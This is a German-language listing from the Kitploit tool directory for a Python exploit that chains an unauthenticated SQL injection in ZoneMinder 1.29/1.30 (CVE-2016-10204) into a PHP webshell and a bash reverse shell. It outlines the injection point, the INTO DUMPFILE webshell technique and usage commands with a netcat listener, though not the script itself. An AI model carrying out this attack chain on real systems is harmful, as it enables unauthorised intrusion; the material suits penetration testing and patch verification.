Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
zoneminder-1.29-1.30-rce-exploit — Unauthentifizierte SQL-Injection-zu-RCE-Exploit für ZoneMinder 1.29/1.30 (CVE-2016-10204, EDB-41239). Single-Command-SQLi-zu-Webshell-zu-Reverse-Shell-PoC in Python. | Kitploit
Tools/GitHubGitHub/akash0x00/zoneminder-1.29-1.30-rce-exploit
SchwachstellenanalyseExploitationWebanwendungs-ExploitationWebsicherheitPenetrationstestsCommand and ControlPayload-Entwicklung
GitHubakash0x00/zoneminder-1.29-1.30-rce-exploit

zoneminder-1.29-1.30-rce-exploit

Unauthentifizierte SQL-Injection-zu-RCE-Exploit für ZoneMinder 1.29/1.30 (CVE-2016-10204, EDB-41239). Single-Command-SQLi-zu-Webshell-zu-Reverse-Shell-PoC in Python.

Repository anzeigen
vor 18h 3mNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

ZoneMinder 1.29/1.30 SQLi to RCE Exploit

Ein sofort einsetzbarer Python-Exploit für ZoneMinder 1.29/1.30, der die nicht authentifizierte SQL-Injection (CVE-2016-10204, EDB-41239) bis hin zu einer interaktiven Reverse Shell verkettet.

Dies ist ein weaponized/automatisierter PoC für eine bekannte, gepatchte CVE, kein neuer Exploit.

Der EDB-PoC für diesen Bug endet beim SQLi-Payload oder bei "richte sqlmap darauf." Dieser Exploit verpackt die vollständige Kette SQLi zu Webshell zu Shell in ein einziges lesbares Skript.

Was es tut

  1. Bestätigt die Injection mit einer zeitbasierten (SLEEP)-Sonde auf dem limit-POST- Parameter von index.php?view=request&request=log&task=query.
  2. Schreibt eine kleine PHP-Webshell über SELECT ... INTO DUMPFILE in das Web-Root, wobei mehrere gängige ZoneMinder/Apache-Pfade ausprobiert werden.
  3. Sucht nach der aktiven Webshell und feuert dann eine bash-Reverse-Shell an deinen netcat-Listener.

Die zwei Fallstricke, die es behandelt

  • DUMPFILE, nicht OUTFILE. OUTFILE escapt Zeilenumbrüche und verunstaltet mehrzeiliges PHP; DUMPFILE schreibt Rohbytes, sodass die Webshell gültig bleibt.
  • Frischer zufälliger Dateiname bei jedem Lauf. MySQL weigert sich, eine existierende Datei zu überschreiben, daher kollidiert ein fester Name mit einem veralteten Drop aus einem vorherigen Lauf.

Verwendung

root@kitploit:~
# pop a shell
python3 zm-exploit.py -u http://TARGET/zm/ -l YOUR_IP -p 443

# start your listener when prompted, in another terminal
sudo nc -lvnp 443

# afterwards, remove the webshell it dropped (name is printed at the end)
python3 zm-exploit.py -u http://TARGET/zm/ --cleanup a1b2c3d4.php

Danksagungen

  • FOXMOLE (Grundlage des Advisories für CVE-2016-10204).
  • Ursprünglicher PoC: Exploit-DB 41239.

Lizenz

MIT, siehe LICENSE.

Tool herunterladen